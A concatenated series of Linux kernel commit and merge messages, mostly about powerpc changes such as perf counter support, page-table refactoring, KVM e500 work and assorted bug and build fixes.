* 'merge' of git://git.kernel.org/pub/scm/linux/kernel/git/benh/powerpc:
powerpc: Fix PCI ROM access
powerpc/pseries: Really fix the oprofile CPU type on pseries
serial/nwpserial: Fix wrong register read address and add interrupt acknowledge.
powerpc/cell: Make ptcal more reliable
powerpc: Allow mem=x cmdline to work with 4G+
powerpc/mpic: Fix incorrect allocation of interrupt rev-map
powerpc: Fix oprofile sampling of marked events on POWER7
powerpc/iseries: Fix pci breakage due to bad dma_data initialization
powerpc: Fix mktree build error on Mac OS X host
powerpc/virtex: Fix duplicate level irq events.
powerpc/virtex: Add uImage to the default images list
powerpc/boot: add simpleImage.* to clean-files list
powerpc/8xx: Update defconfigs
powerpc/embedded6xx: Update defconfigs
powerpc/86xx: Update defconfigs
powerpc/85xx: Update defconfigs
powerpc/83xx: Update defconfigs
powerpc/fsl_soc: Remove mpc83xx_wdt_init, again
This uses values from the MMCRA, SIAR and SDAR registers on
powerpc to supply more precise information for overflow events,
including a data address when PERF_RECORD_ADDR is specified.
Since POWER6 uses different bit positions in MMCRA from earlier
processors, this converts the struct power_pmu limited_pmc5_6
field, which only had 0/1 values, into a flags field and
defines bit values for its previous use (PPMU_LIMITED_PMC5_6)
and a new flag (PPMU_ALT_SIPR) to indicate that the processor
uses the POWER6 bit positions rather than the earlier
positions. It also adds definitions in reg.h for the new and
old positions of the bit that indicates that the SIAR and SDAR
values come from the same instruction.
For the data address, the SDAR value is supplied if we are not
doing instruction sampling. In that case there is no guarantee
that the address given in the PERF_RECORD_ADDR subrecord will
correspond to the instruction whose address is given in the
PERF_RECORD_IP subrecord.
If instruction sampling is enabled (e.g. because this counter
is counting a marked instruction event), then we only supply
the SDAR value for the PERF_RECORD_ADDR subrecord if it
corresponds to the instruction whose address is in the
PERF_RECORD_IP subrecord. Otherwise we supply 0.
[ Impact: support more PMU hardware features on PowerPC ]
Signed-off-by: Paul Mackerras <paulus@samba.org>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Corey Ashford <cjashfor@linux.vnet.ibm.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
LKML-Reference: <18955.37028.48861.555309@drongo.ozlabs.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Although the perf_counter API allows 63-bit raw event codes,
internally in the powerpc back-end we had been using 32-bit
event codes. This expands them to 64 bits so that we can add
bits for specifying threshold start/stop events and instruction
sampling modes later.
This also corrects the return value of can_go_on_limited_pmc;
we were returning an event code rather than just a 0/1 value in
some circumstances. That didn't particularly matter while event
codes were 32-bit, but now that event codes are 64-bit it
might, so this fixes it.
[ Impact: extend PowerPC perfcounter interfaces from u32 to u64 ]
Signed-off-by: Paul Mackerras <paulus@samba.org>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Corey Ashford <cjashfor@linux.vnet.ibm.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
LKML-Reference: <18955.36874.472452.353104@drongo.ozlabs.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
We're currently choking on mem=4g (and above) due to memory_limit
being specified as an unsigned long. Make memory_limit
phys_addr_t to fix this.
Signed-off-by: Becky Bruce <beckyb@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Commit 4fc665b88a "powerpc: Merge 32 and
64-bit dma code" made changes to the PCI initialisation code that added
an assignment to archdata.dma_data but only for 32 bit code. Commit
7eef440a54 "powerpc/pci: Cosmetic cleanups
of pci-common.c" removed the conditional compilation. Unfortunately,
the iSeries code setup the archdata.dma_data before that assignment was
done - effectively overwriting the dma_data with NULL.
Fix this up by moving the iSeries setup of dma_data into a
pci_dma_dev_setup callback.
Signed-off-by: Stephen Rothwell <sfr@canb.auug.org.au>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Some drivers using of_register_platform_driver() wrapper break on sparc
because the wrapper isn't in the header file. This patch moves it from
Microblaze and PowerPC implementations and makes it common code.
Fixes this sparc64 allmodconfig build error (at least):
drivers/leds/leds-gpio.c: In function `gpio_led_init':
drivers/leds/leds-gpio.c:295: error: implicit declaration of function `of_register_platform_driver'
drivers/leds/leds-gpio.c: In function `gpio_led_exit':
drivers/leds/leds-gpio.c:311: error: implicit declaration of function `of_unregister_platform_driver'
Signed-off-by: Grant Likely <grant.likely@secretlab.ca>
Acked-by: David S. Miller <davem@davemloft.net>
Cc: Michal Simek <monstr@monstr.eu>
Cc: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Cc: Stephen Rothwell <sfr@canb.auug.org.au>
Cc: Richard Purdie <rpurdie@rpsys.net>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
POWER5+ and POWER6 have two hardware counters with limited functionality:
PMC5 counts instructions completed in run state and PMC6 counts cycles
in run state. (Run state is the state when a hardware RUN bit is 1;
the idle task clears RUN while waiting for work to do and sets it when
there is work to do.)
These counters can't be written to by the kernel, can't generate
interrupts, and don't obey the freeze conditions. That means we can
only use them for per-task counters (where we know we'll always be in
run state; we can't put a per-task counter on an idle task), and only
if we don't want interrupts and we do want to count in all processor
modes.
Obviously some counters can't go on a limited hardware counter, but there
are also situations where we can only put a counter on a limited hardware
counter - if there are already counters on that exclude some processor
modes and we want to put on a per-task cycle or instruction counter that
doesn't exclude any processor mode, it could go on if it can use a
limited hardware counter.
To keep track of these constraints, this adds a flags argument to the
processor-specific get_alternatives() functions, with three bits defined:
one to say that we can accept alternative event codes that go on limited
counters, one to say we only want alternatives on limited counters, and
one to say that this is a per-task counter and therefore events that are
gated by run state are equivalent to those that aren't (e.g. a "cycles"
event is equivalent to a "cycles in run state" event). These flags
are computed for each counter and stored in the counter->hw.counter_base
field (slightly wonky name for what it does, but it was an existing
unused field).
Since the limited counters don't freeze when we freeze the other counters,
we need some special handling to avoid getting skew between things counted
on the limited counters and those counted on normal counters. To minimize
this skew, if we are using any limited counters, we read PMC5 and PMC6
immediately after setting and clearing the freeze bit. This is done in
a single asm in the new write_mmcr0() function.
The code here is specific to PMC5 and PMC6 being the limited hardware
counters. Being more general (e.g. having a bitmap of limited hardware
counter numbers) would have meant more complex code to read the limited
counters when freezing and unfreezing the normal counters, with
conditional branches, which would have increased the skew. Since it
isn't necessary for the code to be more general at this stage, it isn't.
This also extends the back-ends for POWER5+ and POWER6 to be able to
handle up to 6 counters rather than the 4 they previously handled.
Signed-off-by: Paul Mackerras <paulus@samba.org>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Robert Richter <robert.richter@amd.com>
LKML-Reference: <18936.19035.163066.892208@cargo.ozlabs.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
* 'merge' of git://git.kernel.org/pub/scm/linux/kernel/git/paulus/powerpc:
powerpc/ps3: Fix build error on UP
powerpc/cell: Select PCI for IBM_CELL_BLADE AND CELLEB
powerpc: ppc32 needs elf_read_implies_exec()
powerpc/86xx: Add device_type entry to soc for ppc9a
powerpc/44x: Correct memory size calculation for denali-based boards
maintainers: Fix PowerPC 4xx git tree
powerpc: fix for long standing bug noticed by gcc 4.4.0
Revert "powerpc: Add support for early tlbilx opcode"
On ppc64 we implemented elf_read_implies_exec() for 32-bit binaries
because old toolchains had bugs where they didn't mark program
segments executable that needed to be. For some reason we didn't do
this on ppc32 builds. This hadn't been an issue until commit 8d30c14c
("powerpc/mm: Rework I$/D$ coherency (v3)"), which had as a side
effect that we are now enforcing execute permissions to some extent on
32-bit 4xx and Book E processors.
This fixes it by defining elf_read_implies_exec on 32-bit to turn on
the read-implies-exec behaviour on programs that are sufficiently old
that they don't have a PT_GNU_STACK program header.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Paul Mackerras <paulus@samba.org>
The section .text.init.refok is deprecated and __REF (.ref.text)
should be used in assembly files instead. This patch cleans up a few
uses of .text.init.refok in the powerpc architecture.
Signed-off-by: Tim Abbott <tabbott@mit.edu>
Cc: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Acked-by: Sam Ravnborg <sam@ravnborg.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
This reverts commit e996557740. Our HW
guys were able to fix this so it never sees the light of day.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Now that ppc32 implements address randomization it also wants to inherit
personality flags like ADDR_NO_RANDOMIZE across exec, for things like
`setarch ppc -R' to work. But the ppc32 version of SET_PERSONALITY
forcefully sets PER_LINUX, clearing all personality flags. So be
careful about preserving the flags.
Signed-off-by: Andreas Schwab <schwab@linux-m68k.org>
Signed-off-by: Paul Mackerras <paulus@samba.org>
Richard Henderson pointed out that the powerpc __futex_atomic_op has a
bug: it will write the wrong value if the stwcx. fails and it has to
retry the lwarx/stwcx. loop, since 'oparg' will have been overwritten
by the result from the first time around the loop. This happens
because it uses the same register for 'oparg' (an input) as it uses
for the result.
This fixes it by using separate registers for 'oparg' and 'ret'.
Cc: stable@kernel.org
Signed-off-by: Paul Mackerras <paulus@samba.org>
In commit 51dcdfec6a ("parport: Use the
PCI IRQ if offered") parport_pc_probe_port() gained an irqflags arg.
This isn't being supplied on powerpc. This patch make powerpc fallback
to the old behaviour, that is using "0" for irqflags.
Fixes build failure:
In file included from drivers/parport/parport_pc.c:68:
arch/powerpc/include/asm/parport.h: In function 'parport_pc_find_nonpci_ports':
arch/powerpc/include/asm/parport.h:32: error: too few arguments to function 'parport_pc_probe_port'
arch/powerpc/include/asm/parport.h:32: error: too few arguments to function 'parport_pc_probe_port'
arch/powerpc/include/asm/parport.h:32: error: too few arguments to function 'parport_pc_probe_port'
make[3]: *** [drivers/parport/parport_pc.o] Error 1
Signed-off-by: Tony Breeds <tony@bakeyournoodle.com>
Signed-off-by: Alan Cox <alan@linux.intel.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Conflicts:
arch/powerpc/include/asm/systbl.h
arch/powerpc/include/asm/unistd.h
include/linux/init_task.h
Merge reason: the conflicts are non-trivial: PowerPC placement
of sys_perf_counter_open has to be mixed with the
new preadv/pwrite syscalls.
Signed-off-by: Ingo Molnar <mingo@elte.hu>
During the ISA 2.06 development the opcode for tlbilx changed and some
early implementations used to old opcode. Add support for a MMU_FTR
fixup to deal with this.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
The tlbilx opcode was not matching the Power ISA 2.06 arch spec.
The old opcode was an early suggested opcode that changed during the
2.06 architecture process.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
This fixes a problem reported by Sean MacLennan where loading any
module would cause an oops. We weren't marking the pages containing
the module text as having hardware execute permission, due to a bug
introduced in commit 8d1cf34e ("powerpc/mm: Tweak PTE bit combination
definitions"), hence trying to execute the module text caused an
exception on processors that support hardware execute permission.
This adds _PAGE_HWEXEC to the definitions of PAGE_KERNEL_X and
PAGE_KERNEL_ROX to fix this problem.
Reported-by: Sean MacLennan <smaclennan@pikatech.com>
Signed-off-by: Paul Mackerras <paulus@samba.org>
[paulus@samba.org: changed to use syscall numbers 320 and 321 since
perf_counters is currently using 319.]
Signed-off-by: Stephen Rothwell <sfr@canb.auug.org.au>
Signed-off-by: Paul Mackerras <paulus@samba.org>
Instead of checking for known events, pass in all 1s so we handle future
event types. We were currently missing the IO event type.
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Paul Mackerras <paulus@samba.org>
PHYP tells us how often a shared processor dispatch changed physical cpus.
This can highlight performance problems caused by the hypervisor.
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Paul Mackerras <paulus@samba.org>
CoreInt provides a mechansim to deliver the IRQ vector directly
into the core on an interrupt (via the SPR EPR) rather than having
to go IACK on the PIC. This is suppose to provide an improvment
in interrupt latency by reducing the time to get the IRQ vector.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
While going over the wakeup code I noticed delayed wakeups only work
for hardware counters but basically all software counters rely on
them.
This patch unifies and generalizes the delayed wakeup to fix this
issue.
Since we're dealing with NMI context bits here, use a cmpxchg() based
single link list implementation to track counters that have pending
wakeups.
[ This should really be generic code for delayed wakeups, but since we
cannot use cmpxchg()/xchg() in generic code, I've let it live in the
perf_counter code. -- Eric Dumazet could use it to aggregate the
network wakeups. ]
Furthermore, the x86 method of using TIF flags was flawed in that its
quite possible to end up setting the bit on the idle task, loosing the
wakeup.
The powerpc method uses per-cpu storage and does appear to be
sufficient.
Signed-off-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Acked-by: Paul Mackerras <paulus@samba.org>
Orig-LKML-Reference: <20090330171023.153932974@chello.nl>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: build fix for powerpc
Commit bd753921015e7905 ("perf_counter: software counter event
infrastructure") introduced a use of TIF_PERF_COUNTERS into the core
perfcounter code. This breaks the build on powerpc because we use
a flag in a per-cpu area to signal wakeups on powerpc rather than
a thread_info flag, because the thread_info flags have to be
manipulated with atomic operations and are thus slower than per-cpu
flags.
This fixes the by changing the core to use an abstracted
set_perf_counter_pending() function, which is defined on x86 to set
the TIF_PERF_COUNTERS flag and on powerpc to set the per-cpu flag
(paca->perf_counter_pending). It changes the previous powerpc
definition of set_perf_counter_pending to not take an argument and
adds a clear_perf_counter_pending, so as to simplify the definition
on x86.
On x86, set_perf_counter_pending() is defined as a macro. Defining
it as a static inline in arch/x86/include/asm/perf_counters.h causes
compile failures because <asm/perf_counters.h> gets included early in
<linux/sched.h>, and the definitions of set_tsk_thread_flag etc. are
therefore not available in <asm/perf_counters.h>. (On powerpc this
problem is avoided by defining set_perf_counter_pending etc. in
<asm/hw_irq.h>.)
Signed-off-by: Paul Mackerras <paulus@samba.org>
Merge reason: we have gathered quite a few conflicts, need to merge upstream
Conflicts:
arch/powerpc/kernel/Makefile
arch/x86/ia32/ia32entry.S
arch/x86/include/asm/hardirq.h
arch/x86/include/asm/unistd_32.h
arch/x86/include/asm/unistd_64.h
arch/x86/kernel/cpu/common.c
arch/x86/kernel/irq.c
arch/x86/kernel/syscall_table_32.S
arch/x86/mm/iomap_32.c
include/linux/sched.h
kernel/Makefile
Signed-off-by: Ingo Molnar <mingo@elte.hu>
* git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-cpumask: (36 commits)
cpumask: remove cpumask allocation from idle_balance, fix
numa, cpumask: move numa_node_id default implementation to topology.h, fix
cpumask: remove cpumask allocation from idle_balance
x86: cpumask: x86 mmio-mod.c use cpumask_var_t for downed_cpus
x86: cpumask: update 32-bit APM not to mug current->cpus_allowed
x86: microcode: cleanup
x86: cpumask: use work_on_cpu in arch/x86/kernel/microcode_core.c
cpumask: fix CONFIG_CPUMASK_OFFSTACK=y cpu hotunplug crash
numa, cpumask: move numa_node_id default implementation to topology.h
cpumask: convert node_to_cpumask_map[] to cpumask_var_t
cpumask: remove x86 cpumask_t uses.
cpumask: use cpumask_var_t in uv_flush_tlb_others.
cpumask: remove cpumask_t assignment from vector_allocation_domain()
cpumask: make Xen use the new operators.
cpumask: clean up summit's send_IPI functions
cpumask: use new cpumask functions throughout x86
x86: unify cpu_callin_mask/cpu_callout_mask/cpu_initialized_mask/cpu_sibling_setup_mask
cpumask: convert struct cpuinfo_x86's llc_shared_map to cpumask_var_t
cpumask: convert node_to_cpumask_map[] to cpumask_var_t
x86: unify 32 and 64-bit node_to_cpumask_map
...
Pass the original flags to rwlock arch-code, so that it can re-enable
interrupts if implemented for that architecture.
Initially, make __raw_read_lock_flags and __raw_write_lock_flags stubs
which just do the same thing as non-flags variants.
Signed-off-by: Petr Tesarik <ptesarik@suse.cz>
Signed-off-by: Robin Holt <holt@sgi.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: <linux-arch@vger.kernel.org>
Acked-by: Ingo Molnar <mingo@elte.hu>
Cc: "Luck, Tony" <tony.luck@intel.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
While normally we don't use the math emulation code on ppc64 it can be
useful for doing things like emulating the embedded FP instructions.
Since performance isn't critical in this scenario its easier to keep
the sizes of the various math-emu the same as on ppc32.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
SPEFSCR is a user space register and doesn't conflict with anything.
Moving the defines of the various bit fields makes some emulation
code have fewer ifdefs
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
* 'linux-next' of git://git.kernel.org/pub/scm/linux/kernel/git/jbarnes/pci-2.6: (88 commits)
PCI: fix HT MSI mapping fix
PCI: don't enable too much HT MSI mapping
x86/PCI: make pci=lastbus=255 work when acpi is on
PCI: save and restore PCIe 2.0 registers
PCI: update fakephp for bus_id removal
PCI: fix kernel oops on bridge removal
PCI: fix conflict between SR-IOV and config space sizing
powerpc/PCI: include pci.h in powerpc MSI implementation
PCI Hotplug: schedule fakephp for feature removal
PCI Hotplug: rename legacy_fakephp to fakephp
PCI Hotplug: restore fakephp interface with complete reimplementation
PCI: Introduce /sys/bus/pci/devices/.../rescan
PCI: Introduce /sys/bus/pci/devices/.../remove
PCI: Introduce /sys/bus/pci/rescan
PCI: Introduce pci_rescan_bus()
PCI: do not enable bridges more than once
PCI: do not initialize bridges more than once
PCI: always scan child buses
PCI: pci_scan_slot() returns newly found devices
PCI: don't scan existing devices
...
Fix trivial append-only conflict in Documentation/feature-removal-schedule.txt
Use debug_kmap_atomic in kmap_atomic, kmap_atomic_pfn, and
iomap_atomic_prot_pfn.
Signed-off-by: Akinobu Mita <akinobu.mita@gmail.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Ingo Molnar <mingo@redhat.com>
Cc: "H. Peter Anvin" <hpa@zytor.com>
Cc: <linux-arch@vger.kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Everyone defines it, and only one person uses it
(arch/mips/sgi-ip27/ip27-nmi.c). So just open code it there.
Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Cc: linux-mips@linux-mips.org
Due to a different size of ino_t ustat needs a compat handler, but
currently only x86 and mips provide one. Add a generic compat_sys_ustat
and switch all architectures over to it. Instead of doing various
user copy hacks compat_sys_ustat just reimplements sys_ustat as
it's trivial. This was suggested by Arnd Bergmann.
Found by Eric Sandeen when running xfstests/017 on ppc64, which causes
stack smashing warnings on RHEL/Fedora due to the too large amount of
data writen by the syscall.
Signed-off-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
On powerpc64 machines running 32-bit userspace, we can get garbage bits in the
stack pointer passed into the kernel. Most places handle this correctly, but
the signal handling code uses the passed value directly for allocating signal
stack frames.
This fixes the issue by introducing a get_clean_sp function that returns a
sanitized stack pointer. For 32-bit tasks on a 64-bit kernel, the stack
pointer is masked correctly. In all other cases, the stack pointer is simply
returned.
Additionally, we pass an 'is_32' parameter to get_sigframe now in order to
get the properly sanitized stack. The callers are know to be 32 or 64-bit
statically.
Signed-off-by: Josh Boyer <jwboyer@linux.vnet.ibm.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next-2.6: (1750 commits)
ixgbe: Allow Priority Flow Control settings to survive a device reset
net: core: remove unneeded include in net/core/utils.c.
e1000e: update version number
e1000e: fix close interrupt race
e1000e: fix loss of multicast packets
e1000e: commonize tx cleanup routine to match e1000 & igb
netfilter: fix nf_logger name in ebt_ulog.
netfilter: fix warning in ebt_ulog init function.
netfilter: fix warning about invalid const usage
e1000: fix close race with interrupt
e1000: cleanup clean_tx_irq routine so that it completely cleans ring
e1000: fix tx hang detect logic and address dma mapping issues
bridge: bad error handling when adding invalid ether address
bonding: select current active slave when enslaving device for mode tlb and alb
gianfar: reallocate skb when headroom is not enough for fcb
Bump release date to 25Mar2009 and version to 0.22
r6040: Fix second PHY address
qeth: fix wait_event_timeout handling
qeth: check for completion of a running recovery
qeth: unregister MAC addresses during recovery.
...
Manually fixed up conflicts in:
drivers/infiniband/hw/cxgb3/cxio_hal.h
drivers/infiniband/hw/nes/nes_nic.c
So, KVM needs to read tlbcam_index to know exactly
which TLB1 entry is unused by host.
Signed-off-by: Liu Yu <yu.liu@freescale.com>
Acked-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
After the rewrite of KVM's debug support, this code doesn't even build any
more.
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
When itlb or dtlb miss happens, E500 needs to update some mmu registers.
So that the auto-load mechanism can work on E500 when write a tlb entry.
Signed-off-by: Liu Yu <yu.liu@freescale.com>
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
Kernel for E500 need clear dbsr when startup.
So add dbsr register in kvm_vcpu_arch for BOOKE.
Signed-off-by: Liu Yu <yu.liu@freescale.com>
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
Passing just the TLB index will ease an e500 implementation.
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
Remove the remaining arch fragments of the old guest debug interface
that now break non-x86 builds.
Signed-off-by: Jan Kiszka <jan.kiszka@siemens.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
This rips out the support for KVM_DEBUG_GUEST and introduces a new IOCTL
instead: KVM_SET_GUEST_DEBUG. The IOCTL payload consists of a generic
part, controlling the "main switch" and the single-step feature. The
arch specific part adds an x86 interface for intercepting both types of
debug exceptions separately and re-injecting them when the host was not
interested. Moveover, the foundation for guest debugging via debug
registers is layed.
To signal breakpoint events properly back to userland, an arch-specific
data block is now returned along KVM_EXIT_DEBUG. For x86, the arch block
contains the PC, the debug exception, and relevant debug registers to
tell debug events properly apart.
The availability of this new interface is signaled by
KVM_CAP_SET_GUEST_DEBUG. Empty stubs for not yet supported archs are
provided.
Note that both SVM and VTX are supported, but only the latter was tested
yet. Based on the experience with all those VTX corner case, I would be
fairly surprised if SVM will work out of the box.
Signed-off-by: Jan Kiszka <jan.kiszka@siemens.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
This moves some MMU related init code out of setup_64.c into hash_utils_64.c
and calls it early_init_mmu() and early_init_mmu_secondary(). This will
make it easier to plug in a new MMU type.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
ppc32 has it already, add it to ppc64 as a preliminary for adding
support for Book3E 64-bit support
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Now that they are almost identical, we can merge some of the definitions
related to the PTE format into common files.
This creates a new pte-common.h which is included by both 32 and 64-bit
right after the CPU specific pte-*.h file, and which defines some
bits to "default" values if they haven't been defined already, and
then provides a generic definition of most of the bit combinations
based on these and exposed to the rest of the kernel.
I also moved to the common pgtable.h most of the "small" accessors to the
PTE bits and modification helpers (pte_mk*). The actual accessors remain
in their separate files.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
This patch tweaks the way some PTE bit combinations are defined, in such a
way that the 32 and 64-bit variant become almost identical and that will
make it easier to bring in a new common pte-* file for the new variant
of the Book3-E support.
The combination of bits defining access to kernel pages are now clearly
separated from the combination used by userspace and the core VM. The
resulting generated code should remain identical unless I made a mistake.
Note: While at it, I removed a non-sensical statement related to CONFIG_KGDB
in ppc_mmu_32.c which could cause kernel mappings to be user accessible when
that option is enabled. Probably something that bitrot.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Complete workaround for DTLB errata in e300c2/c3/c4 processors.
Due to the bug, the hardware-implemented LRU algorythm always goes to way
1 of the TLB. This fix implements the proposed software workaround in
form of a LRW table for chosing the TLB-way.
Based on patch from David Jander <david@protonic.nl>
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Now that we set archdata for of_platform and platform devices via
platform_notify() we no longer need to special case having a NULL device
pointer or NULL archdata. It should be a driver error if this condition
shows up and the driver should be fixed.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Makes code futureproof against the impending change to mm->cpu_vm_mask.
It's also a chance to use the new cpumask_ ops which take a pointer
(the older ones are deprecated, but there's no hurry for arch code).
Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
PAPR v2.3 defines fields in the virtual processor area for a dispatch
trace log (DLT). Since we'd like to use the DLT, add the necessary
fields to struct lppaca.
Signed-off-by: Jeremy Kerr <jk@ozlabs.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
The page_ins member ends at byte 0x3, not 0x4. Also, fix up the
alignment.
Signed-off-by: Jeremy Kerr <jk@ozlabs.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
This updates the 32-bit headers to use the same definitions for the RPN
shift inside the PTE as 64-bit, and thus updates _PAGE_CHG_MASK to
become identical.
This does introduce a runtime visible difference, which is that now,
_PAGE_HASHPTE will be part of _PAGE_CHG_MASK and thus preserved. However
this should have no practical effect as it should have been preserved in
the first place and we got away with not having it there due to our
PTE access functions preserving it anyway.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
This patch moves the definition of the PTE format for each MMU type
to separate files instead of all in one file. This improves overall
maintainability and will make it easier to add new types.
On 64-bit, additionally, I've separated the headers relative to the
format of the page table tree (3 vs. 4 levels for 64K vs 4K pages)
from the headers specific to the PTE format for hash based processors,
this will make it easier to add support for Book3 "E" 64-bit
implementations.
There are still some type-related ifdef's in the generic headers,
we might remove them in the long run, but this patch shouldn't result
in any code change, -hopefully- just definitions being moved around.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Weak functions aren't all they're cracked up to be. They lead to
incorrect binaries with some toolchains, they require us to have empty
functions we otherwise wouldn't, and the unused code is not elided
(as of gcc 4.3.2 anyway).
So replace the weak MSI arch hooks with the #define foo foo idiom. We no
longer need empty versions of arch_setup/teardown_msi_irq().
This is less source (by 1 line!), and results in smaller binaries too:
text data bss dec hex filename
9354300 1693916 678424 11726640 b2ef30 build/powerpc/vmlinux-before
9354052 1693852 678424 11726328 b2edf8 build/powerpc/vmlinux-after
Also smaller on x86_64 and arm (iop13xx).
Signed-off-by: Michael Ellerman <michael@ellerman.id.au>
Signed-off-by: Jesse Barnes <jbarnes@virtuousgeek.org>
Impact: build fix for powerpc and sparc
Today's linux-next build (powerpc allyesconfig) failed like this:
> In file included from include/linux/mmzone.h:776,
> from include/linux/gfp.h:5,
> from include/linux/kmod.h:23,
> from include/linux/module.h:14,
> from init/version.c:11:
> arch/powerpc/include/asm/mmzone.h:32: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'numa_cpumask_lookup_table'
Caused by commit 082edb7bf4 ("numa,
cpumask: move numa_node_id default implementation to topology.h") from
the cpus4096 tree which removed the include of linux/topology.h from
linux/mmzone.h.
Same for sparc64 defconfig.
Signed-off-by: Stephen Rothwell <sfr@canb.auug.org.au>
Acked-b: Rusty Russell <rusty@rustcorp.com.au>
Cc: ppc-dev <linuxppc-dev@ozlabs.org>
LKML-Reference: <20090319220322.3baa4613.sfr@canb.auug.org.au>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
BestComm, a DMA engine in MPC52xx SoC, requires snooping when
CPU caches are enabled to work properly.
Adding CPU_FTR_NEED_COHERENT fixes NFS problems on MPC52xx machines
introduced by 'powerpc/mm: Fix handling of _PAGE_COHERENT in BAT setup
code' (sha1: 4c456a67f5).
Signed-off-by: Piotr Ziecik <kosmo@semihalf.com>
Signed-off-by: Grant Likely <grant.likely@secretlab.ca>
This patch adds the utility function mpc52xx_get_xtal_freq() to get
the frequency of the external oscillator clock connected to the pin
SYS_XTAL_IN. The MSCAN may us it as clock source. Unfortunately, this
value is not available from the FDT blob, but it can be determined
from the IPB frequency.
Signed-off-by: Wolfgang Grandegger <wg@grandegger.com>
Signed-off-by: Grant Likely <grant.likely@secretlab.ca>
Impact: cleanup
Convert the last remaining users to struct irq_chip.
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
CC: Benjamin Herrenschmidt <benh@kernel.crashing.org>
CC: linuxppc-dev@ozlabs.org
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
When the console is on a serial port to be driven by serial8250, a
character can be lost from the end of the first line in the two-line
sequence
serial8250.0: ttyS0 at MMIO 0xe0004500 (irq = 42) is a 16550A
console handover: boot [udbg0] -> real [ttyS0]
This happens because udbg_puts or udbg_write stuff the last byte of
the line into the Tx FIFO and return, whereupon the serial8250
initialization code immediately empties that FIFO. The fix: udbg_puts
and udbg_write now wait for the Tx FIFO to clear before returning.
This delays the system by one additional serial frame time for each
line written by udbg, but the effect is not noticeable, a cumulative
17 milliseconds for 200 lines of early printk output at 115200 baud.
Also, the routines in udbg_16550.c now emit CRLF instead of LFCR.
Linux makes a point of emitting CRLF because, when serial output is
captured to a file, LFCR sequences can confuse text editors. See
http://lkml.org/lkml/2006/2/4/50 for some history.
Signed-off-by: Andrew Klossner <andrew@cesa.opbu.xerox.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Change the ps3av_auto_videomode() mode id argument type from unsigned to
signed so a negative id can be detected and reported as an -EINVAL failure.
Signed-off-by: Roel Kluin <roel.kluin@gmail.com>
Signed-off-by: Geoff Levand <geoffrey.levand@am.sony.com>
